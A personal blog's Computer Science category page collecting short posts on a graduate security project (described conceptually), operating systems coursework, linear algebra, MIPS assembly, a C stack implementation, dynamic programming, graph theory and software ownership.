Category: Computer Science

  • Information Security – Project 4

    This afternoon, I started on project 4 for introduction to information security (IIS). This goal for this project is to have us students learn more about web security and consists of three objectives, manufacturing three web attacks: cross site scripting, cross site forgery and structure query language (SQL) injection attack. And although I’m very familiar with the terms, I’ve actually never carried out any of those attacks in neither an academic or professional setting. In this post, I’ll share some of the things I learned while spending 4 hours in a cafe chipping away at the project.

    Cross site request forgery (CSRF)

    This attack was very straight forward: inspect the source code of the (PHP) files and carefully tease out which form inputs could be set in the body of the HTTP POST.

    Cross site scripting (XSS)

    This task was a ton of fun. Initially, I headed down an entirely wrong path and found myself getting very frustrated. Initially, because of the video lectures, I had wrongly assumed that the only way to perform the attack was to embed an iFrame my hand crafted HTML page, the iFrame loading the contents of the remote website, the target of the attack. And although this entirely possible, embedding an iFrame is unnecessary: what I really need to do is basically send an HTTP post to the remote site, embedding javascript in one of FORM values, carefully ensuring that when the page renders in the browser, it’s identical to the original website.

  • Week 1 of master’s in computer science

    January 7th, 2019 marks the first day of my computer science master’s program through University of Georgia Tech. The week leading up to the first day was somewhat stressful since I was mid flight (returning to Seattle from London), my plane hovering over the massive blue sea, while I frantically typed away on my keyboard trying to register for a course in my allotted time window. Because of the spotty internet connection on the airplane, it took me about an hour and half to register for my course and by that point, the open spots filled up so fast that I positioned 100+ on the wait list (which I discovered, later on after reading online posts, that 100+ wait list is normal and that I would like get get into the course, which I did).

    Anyways, despite all that headache, I’m officially enrolled in a course that I’ve wanted to take for a very very long time: Introduction to Operating Systems. So far, although it’s only been 1 week, I love the course, for multiple reasons.

    First, I love the collaborative and sense of community of the program. Before getting into this master’s program, I was taking a handful of undergraduate computer science courses (e.g. computer organization, discrete mathematics, data structures) from University of North Dakota and University of Northern Iowa, two excellent schools that offered courses through their Distant Learning platform. Now although I learned a lot from the courses, I always felt like I was working in isolation, by myself, my only interaction was through a few short threaded e-mails with the professors. But now, with this course, there’s an online forum (i.e. Piazza) and chatty chatroom (via Slack, which was paid out of pocket by one of the TA of the course), where students fire off questions and comments (especially random comments in the #random slack channel). So in a sense, despite never meeting these folks, there’s a sense of comradery, a shared a goal.

    Second, I’m learning a ton of material that’s not only applicable to my day to day job (as a software engineer) but material that I’m genuinely interested in. For the first week, the professor of the course has us reading a 30 page white paper (titled “Introduction to Threading”) written in 1989, a seminal piece of work (on threads and concurrency) that gives me perspective and appreciation of my industry. In addition to reading the white paper, I’m watching lectures covering fundamental operating system concepts (e.g. processes, virtual memory) and above all, writing C code! A ton of C code!

    The project has us writing code for a multi-threaded client and multi-threaded web server (think implementing HTTP protocol) that’s intended to teach us how to write safe, concurrent systems that utilize the threading facility offered by the operating system.

  • History of i,j,k variables ?

    Any time you read code (in production or from a textbook), you’ll often see the control variable, when employing for loops, being declared with the variables i,j,k. And for most of my programming career, I’ve never really questioned why we specifically choose those three letters. Why not m (a great letter), or c or d or e — or any other letter for that matter. Seems rather arbitrary.

    But, I suspect that it has to do with William Rowan Hamilton, a famous Irish mathematician, who published a book in the 1800’s, the book titled “A theory of Systems of Rays”. And in this book, William uses i, j, notation when representing vectors (in R3).  This representation of vectors became the standard notation and he’s the person we need to thank when we type in those three letters when programming.  

  • Linear algebra – exam 1

    Earlier this morning, before starting the work week, I took my first linear algebra exam at the nearby Northgate Testing center.  The proctored exam covered the first four modules in the course, topics including:

    • Gaussian elimination (row echelon)
    • Gaussian Jordan elimination (row reduced echelon)
    • Adding, subtracting, multiplying matrices
    • Calculating the inverse of matrices (using identity matrices)
    • LU Factorization

    I felt well prepared (thanks again to Khan Academy and 3Blue1Brown). Going into the exam, I worked (and reworked) the suggested exercises in the textbook.  Honestly, I think if I hadn’t attempted the exercises, my mind would’ve tricked me into believing that I understood the material. But that obviously wasn’t the case because the different math problems had me fumbling around, furiously scribbling pencil all over my notebook paper followed by vigorous strokes of erasing. Anyways, 1 exam down — 2 more to go.

    Next topic: calculating the determinant of a matrix (at this present moment, I have no idea what that means)

     

  • Assembly RA (return address)

    About a year has passed since I took computer organization and I’m a bit disappointed of how much of the material faded from my memory. I only realized this while reading about Exception Control Flow (ECF) in the book Computer Systems: A programmer’s perspective, when the authors mentioned:

    As with a procedure call, the processor pushes a return address on the stack before branching to the handler

    Section 8.1 Exceptions

    I had to pause for a moment because despite a handful of assembly programs — one of them where I implemented quicksort — I totally forgot how, in assembly, how the return address gets handled. But after reviewing my own assembly program that I wrote earlier this year, I realized that the syscall directs the processor to store the PC value into the ra (return address) register.  Then, it’s the callee’s responsiblity to then save that value on the stack and after its routine finishes, call jr (jump return).

    Here’s some sample code

    main:
    	la $a0, numbers		# Load the address numbers into $a0, the first argument
    	li $a1, 0		# Load 0 into $a, the second argument
    	lw $t0, length		# Load the length of the array into temporary register $t0
    	sub $a2, $t0, 1		# Subtract 1 from the length of the array and store into $a3, the first argument
    	jal quicksort
    	li $v0, 10
    	syscall
    
    quicksort:
    
    quicksort_if:
    
    	bge $a1, $a2, quicksort_end_if	# CHeck if low < high
    
    quicksort_body:
    	addi, $sp, $sp, -24	# Update the stack pointer, allocating enough room for savin the 6 registers
    	sw $ra, 0($sp)		# Store return address on the stack
    	sw $s0, 4($sp)		# Store $s1 on the stack
    	sw $s1, 8($sp)		# Store $s2 on the stack
    	sw $s2, 12($sp)		# Store $s3 on the stack
    	sw $s3, 16($sp)		# Store $s3 on the stack
    	sw $s4, 20($sp)		# Store $s3 on the stack
    	move $s0, $a0		# Store $a0 (address of array) into $s0
    	move $s1, $a1		# Store $a1 (low) into $s1
    	move $s2, $a2		# Store $a2 (high) into $s2
    	jal partition		# Call the subprogram partition
    	move $s4, $v0		# Store pivot -1 into $a2
    	move $a0, $s0		# Store $s0, array, into $a0
    	move $a1, $s1		# Store $s1, low, into $a1
    	move $a2, $s4		# Store pivot position in $a2
    	sub $a2, $a2, 1		# Subtract 1 from $a2 (i.e. pivot - 1)
    	jal quicksort		# First call to quicksort (i.e. quickSort(array, low, pivotPosition - 1)
    	move $a0, $s0		# Store array into $a0
    	move $a1, $s4		# Move pivot into $a1
    	add $a1, $a1, 1		# Add 1 to $a1 (i.e. pivot + 1)
    	move $a2, $s2		# Move high (i.e. $s2) into $a2
    	jal quicksort		# Second call to quicksort (i.e. quickSort(array, pivotPosition + 1, high)
    	lw $ra, 0($sp)		# Restore the return address from the stack and back into $ra
    	lw $s0, 4($sp)		# Restore $s0 from the stack
    	lw $s1, 8($sp)		# Restore $s1 from the stack
    	lw $s2, 12($sp)		# Restore $s2 from the stack
    	lw $s3, 16($sp)		# Restore $s2 from the stack
    	lw $s4, 20($sp)		# Restore $s2 from the stack
    	addi $sp, $sp, 24	# Pop the call frame
  • Flexing C muscles

    I’ve been sharpening my C programming skills because I’m now working on a team (i.e. EC2 Networking) within Amazon Web Services that requires skills in lower level software development. And I must say, I’m truly rusty. A noob. On top of that, my only experience with C in the past has been fairly superficial, me dabbling here and there in the K & R book, long before I had taken any computer science courses.  But since taking computer organization and data structures, I have a tight understanding of pointers and their practical uses.

    But I digress.

    I’m currently working through a book written by Zed Shaw, the book titled “Learn C the hard way.” I had picked up the book at the local library in Seattle, stumbling upon it while I was running my fingers along the spines of books in the computer science section. This book has mixed reviews. Some websites strongly dissuade readers from reading anything published by this particular author.  But others recommend it. So, I’m taking their advice with a grain of salt and forming my own opinion.

    At the end of every chapter, the author recommends some extra credit exercises.  In one of these exercises, the author suggests implementing a stack data structure in C.  Now, there are two popular implementations when building a stack: using an array and using a linked list. So, I took this exercise as an opportunity to write a simple stack data structure using linked lists (you gotta love them C pointers).

    Here’s the program output:

    ./stack_linked_list
    
    Stack is empty. Pushing 10 to the top of stack
    Stack is not empty. Pushing 20 to the top of the stack
    Stack is not empty. Pushing 30 to the top of the stack
    Popped item: 30
    Peeking at next item: 20
    Peeking at next item: 20
    Peeking at next item: 20
    Popped item: 20
    Popped item: 10
    Popped item: -1

    And the corresponding code:

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdbool.h>
    
    struct Node {
        int value;
        struct Node * next;
    };
    
    struct Stack {
        int count;
        struct Node * top;
    };
    
    
    bool isEmpty(struct Stack * stack)
    {
        return stack->top == NULL;
    }
    
    void push(struct Stack * stack, int item)
    {
        /*
         * Edge case: first item to push
         */
    
        struct Node * node = (struct Node *) malloc(sizeof(struct Node));
        node->value = item;
    
        if (stack->top == NULL){
            printf("Stack is empty. Pushing %i to the top of stack\n", item);
            stack->top = node;
        } else {
            printf("Stack is not empty. Pushing %i to the top of the stack\n", item);
            node->next = stack->top;
            stack->top = node;
        }
    
        stack->count++;
        return;
    
    }
    int pop(struct Stack * stack)
    {
        if (isEmpty(stack)){
            return -1;
        }
    
        struct Node * node = stack->top;
        stack->top = node->next;
    
        return node->value;
    }
    
    int peek(struct Stack * stack)
    {
        if (isEmpty(stack)){
            return -1;
        }
    
        return stack->top->value;
    }
    
    
    int main(int argc, char * argv[])
    {
        struct Stack stack;
        push(&stack, 10);
        push(&stack, 20);
        push(&stack, 30);
        printf("Popped item: %i\n", pop(&stack));
        printf("Peeking at next item: %i\n", peek(&stack));
        printf("Peeking at next item: %i\n", peek(&stack));
        printf("Peeking at next item: %i\n", peek(&stack));
        printf("Popped item: %i\n", pop(&stack));
        printf("Popped item: %i\n", pop(&stack));
        printf("Popped item: %i\n", pop(&stack));
        return 0;
    }

     

  • The beauty of dynamic programming

    I just discovered dynamic programming and damn, I’m blown away by the concept.  The other day, hile working through a homework assignment, I compared the run times between two python functions that I wrote, one function written recursively and the other written in a dynamic programming fashion.  Starting with the recursive solution, I arrived at the following:

    def fibonacci(n):
        if n == 0:
            return 0
        if n == 1:
            return 1
        return fibonacci(n-1) + fibonacci(n-2)
    

    That’s a fairly standard implementation of Fibonacci. There are two base cases; n=0; n=1.  So when n is either of these two numbers, the function simply returns 0 or 1, respectively.  But for any other number, the function recursively calls itself until reaching the aforementioned base cases.

    So far so good, right?  And for calculating small values of n, this implementation doesn’t really present a problem. But say we want to calculate fibonacci when n equals 40. How long does this take? Alarmingly, this computation hovers around 45 seconds:

    ./fibonacci.py 40
    fibonacci(40) = 102334155 took 45.22154 seconds
    

    Now, what if we run the same calculation. But this time, we run it using a dynamic programming technique? How much time does that shave off?

    ./fibonacci.py  --dynamic-programming 40
    fibonacci(40) = 102334155 took 0.00002 seconds
    

    What ?! From 45 seconds down to under a millisecond ?! How is that possible?

    def fibonacci_dynamic_programming(n):
        fibonacci = [0,1]
        for _ in range(0, n):
            fibonacci.append(fibonacci[-1] + fibonacci[-2])
        return fibonacci[n-1] + fibonacci[n-2]

    As you can see from the code above, instead of recurisvely calling fibonacci, we iteratively calculate all the values. In other words, this implementation runs linearly (i.e. direct proportion to n), unlike the first, recursive implementation, which runs exponentially.

     

     

  • Wrapping up discrete mathematics course

    Last Friday, I took the final exam for my (distant learning) discrete mathematics course and just now I had logged into the student portal (i.e. Blackboard), surprised to find that my exam had not only been graded but my final grade had been posted as well. I finished the course with an 88%, a B, a few points short of an A.  In the past, I would’ve incessantly beat myself up over not achieving the highest grade, denigrating myself with self destructive thoughts: if only I tried harder … if only I studied more … if only I was smarter …

     But not this time.

    This time, I’m inhibiting those thoughts. Instead, I’m celebrating. Celebrating that I’m fortunate enough to be able to take this mathematics course, a course where I learned about: writing proofs, solving Diophantine equations, applying set theory, counting with modular arithmetic, proving assertions with mathematic induction, converting recursive functions into closed form functions using characteristic equations method. Prior to the course, I was never exposed to those concepts.  Looking back, I only vaguely heard of those terms.  And who knows if I get to apply any of those concepts as I pursue a master’s – maybe a PhD, one day. Who knows if I’m lucky enough to apply that knowledge to my job as a software engineer.

    But who cares?  Because really, my goal was to stretch myself, learning more about my field and craft: computer science.

  • Graph theory and upcoming final exam

    I just scheduled my final exam for my discrete mathematics course, now that I submitted my homework for the final assignment covering graph theory. Throughout this assignment, I was introduced to a variety of concepts: Leonard Euler and his discovery of Euler paths and circuits, Hamiltonian paths and circuits, and a handful of graph related terminology (e.g. vertex, edges, degrees, bridge, cut-vertices, isomorphic graphs, trees, forests).

    In addition to the concepts above, I learned two different ways to represent graphs in (computer) memory. One approach is using adjacency matrix, a matrix whose columns and rows are represented by each vertex. The second way to represent a graph is by an incidence matrix; unlike an adjacency graph, an incidence matrix’s columns are vertices, the rows representing edges.

    Star like graph
    Star like graph

    Adjancey and Incidence matrix
    Two ways to represent the (above) graph

    Although the lesson only scratched the surface on graph theory, I reveled in the fact that many of the terms I learned were actually terms that I encountered at work, terms that I had no idea were rooted in mathematics.

    For example, the term forest (in graph theory) is defined as a collection of trees; I encountered this term while working as a system administrator, a time when I managed Active Directory (a centralized authentication system) and all the security rules and policies bound to a forest.

    In addition to the example above, I find comfort in the fact that some data structures (e.g. binary search tree) and algorithms (e.g. breadth first search) that I’ve studied in the past build on top of graph theory.

    Star-like graphs that are nonisomorphic
    Star-like graphs that are nonisomorphic

    In any case, I really enjoyed learning about graph theory, a lesson I’ll continue to build on top of as I pursue my life long study of mathematics and computer science.

  • Software and system ownership

    Although I sometimes find getting paged for operational issues enervating, I wouldn’t have it any other way.

    It’s well known that software engineers at Amazon (Web Services) own their systems, end to end. This means that we not only develop and maintain our software, but we operate the underlying system, complete ownership.

    From a software point of view, one can run into an infinite number of issues. Got a build error? Roll up them sleeves and start digging through the compilation errors.  You committed some code that broke the build? Fix or rollback the changes. You defined a dependency that’s deprecated? Update the dependency and ensure your unit and integration tests pass.

    Similarly, we maintain the underlying system. If we deploy our systems to a servers, physical or virtual (e.g. EC2), we must keep it alive, like a breathing entity. From checking disk performance, to checking heap allocation, we monitor our systems closely, configuring monitors to alarm us when any component misbehaves.

    In other words, there’s no divide between development and operations. There’s no separate team that handles operational issues, no DevOps. There’s no nonsense like writing our software and then chucking it over to another group to deploy it, a group that would otherwise find it annoying at best and frustrating at worst.  Because I’ve been in those positions, where I’m on the hook for deploying software that I cannot fix. Similarly, I’ve been in situations where the deployment fails and then I must ring in someone who’s more familiar with the code base.

    But now, I’m in a position where I’m responsible for the code I write.

    Why is this important?

    Although some would argue that software developers should stick to software development, and that there should be a clear separation of duty, I believe that owning a system end to end promotes operational excellence and a sense of ownership.